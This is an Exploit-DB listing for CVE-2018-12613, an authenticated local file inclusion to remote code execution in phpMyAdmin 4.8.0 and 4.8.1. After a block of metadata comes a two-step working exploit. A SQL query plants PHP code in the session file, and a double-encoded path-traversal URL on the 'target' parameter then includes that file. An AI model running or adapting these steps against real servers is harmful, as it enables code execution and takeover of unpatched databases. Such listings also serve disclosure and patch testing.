phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2)

Author: VulnSpy
type: webapps
platform: php
port: 80.0
date_added: 2018-06-22  
date_updated: 2018-07-17  
verified: 1  
codes: CVE-2018-12613  
tags: File Inclusion (LFI/RFI)  
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt45000/44928.png  
application_url: http://www.exploit-db.comphpmyadmin-RELEASE_4_8_1.tar.gz  

raw file: 44928.txt  

# Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution
# Date: 2018-06-21
# Exploit Author: VulnSpy
# Vendor Homepage: http://www.phpmyadmin.net
# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz
# Version: 4.8.0, 4.8.1
# Tested on: php7 mysql5
# CVE : CVE-2018-12613

1. Run SQL Query : select '<?php phpinfo();exit;?>'
2. Include the session file :
http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k